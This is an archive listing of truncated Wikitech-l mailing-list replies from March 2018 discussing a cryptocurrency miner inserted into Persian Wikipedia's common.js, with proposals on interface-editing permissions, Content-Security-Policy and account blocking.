Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-19 Thread David Gerard
This is particularly important for non-Wikimedia instances of MediaWiki, by the way. (e.g. on RationalWiki there's a cultural thing of "everyone is a sysop!" but the interface/JS editing rights are restricted to a much smaller "tech" group who are trusted not to be silly) - d. On 19 March

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-19 Thread Derk-Jan Hartman
On a side note. Have we looked recently at decoupling the site wide JS/CSS rights from the edit interface right ? It has always seemed a bit weird to me that we had both these things in MediaWiki namespace, but the more we are closing down raw HTML in MediaWiki namespace, the weirder it becomes.

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Alex Monk
On Sat, 17 Mar 2018, 18:16 Chico Venancio, wrote: > Alex Monk wrote: > I don't think the communities actually want js injected without code-review > that much. They (we) do want to have easy access to gadget and scripts > though. > Attempting to impose any procedure

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Chico Venancio
Pine wrote: > I hope that there is way that these suggestions are being tracked but I > don't see a public task for this on the Security workboard, possibly to > avoid announcing vulnerabilities in public until they have been assessed. There is the https://phabricator.wikimedia.org/T71445 that

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Alex Monk
You'd have to stop stewards from loading site-wide JS, gadgets, as well as removing their ability to have their user JS from pulling in JS from other sites/users/etc. somehow. Trying to restrict it would probably lead to a backlash from communities that would make superprotect look like a joke. I

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Pine W
Musikanimal, that sounds like a good suggestion to add to Phabricator. I hope that there is way that these suggestions are being tracked but I don't see a public task for this on the Security workboard, possibly to avoid announcing vulnerabilities in public until they have been assessed. Unless

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-16 Thread Leon Ziemba
Sorry to slightly sidetrack this discussion, but someone recently asked me if it were possible to modify a steward's user JS so that it granted them advanced rights like steward/checkuser/oversight. This of course is possible, but very rare since you need to be a sysop to edit these JS pages. The

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-15 Thread Eran Rosenthal
Lego already did a script to verify no external resources are loaded: https://phabricator.wikimedia.org/T71519 I think there is a Jenkins job running it on regular basis On Thu, Mar 15, 2018 at 6:30 AM, MZMcBride wrote: > David Gerard wrote: > >What ways are there to include

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-15 Thread Gergo Tisza
On Wed, Mar 14, 2018 at 9:14 AM, Jon Robson wrote: > It has always made me a little uneasy that there are wiki pages where > JavaScript could potentially be injected into my page without my approval. > To be honest if I had the option I would disable all site and user

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread MZMcBride
David Gerard wrote: >What ways are there to include user-edited JavaScript in a wiki page? > >[...] > >You can't see it now, but it was someone including a JavaScript >cryptocurrency miner in common.js! > >Obviously this is not going to be a common thing, and common.js is >closely watched. (The

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Jon Robson
It has always made me a little uneasy that there are wiki pages where JavaScript could potentially be injected into my page without my approval. To be honest if I had the option I would disable all site and user scripts for my account. Has this sort of thing happened before? Can we be sure there

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Lucas Werkmeister
A restrictive script-src in a Content-Security-Policy (RFC , T135963 ) could have helped with this. Alternatively, a report-mode CSP could at least have brought this to global

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Amir Ladsgroup
That already happened and the user got blocked indefinitely immediately after the incident. The JS was there for seven minutes which bad enough IMO. One thing is that Persian Wikipedia community is working to strip the right of editing mediawiki ns from the templateeditor user group:

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Derk-Jan Hartman
In my opinion, such accounts should be globally blocked btw. It is a grave breach of trust and such accounts cannot be trusted anywhere else either. Thanks for playing, but goodbye for ever. DJ On Wed, Mar 14, 2018 at 3:42 PM, Brian Wolff wrote: > On Wednesday, March 14,

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Brian Wolff
On Wednesday, March 14, 2018, David Gerard wrote: > What ways are there to include user-edited JavaScript in a wiki page? > > I ask because someone put this revision in (which is now deleted): > >

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Yongmin H.
editinterface (usually only available to sysops on wmf wikis) is required to edit MediaWiki: namespace, which includes MediaWiki:(blah).css/js. And edituser(css/js) is required to edit other user’s CSS/JS files. In fawiki case, these permissions are available in template editor, so once he

[Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread David Gerard
What ways are there to include user-edited JavaScript in a wiki page? I ask because someone put this revision in (which is now deleted): https://fa.wikipedia.org/w/index.php?title=%D9%85%D8%AF%DB%8C%D8%A7%D9%88%DB%8C%DA%A9%DB%8C:Common.js=next=22367460=en You can't see it now, but it was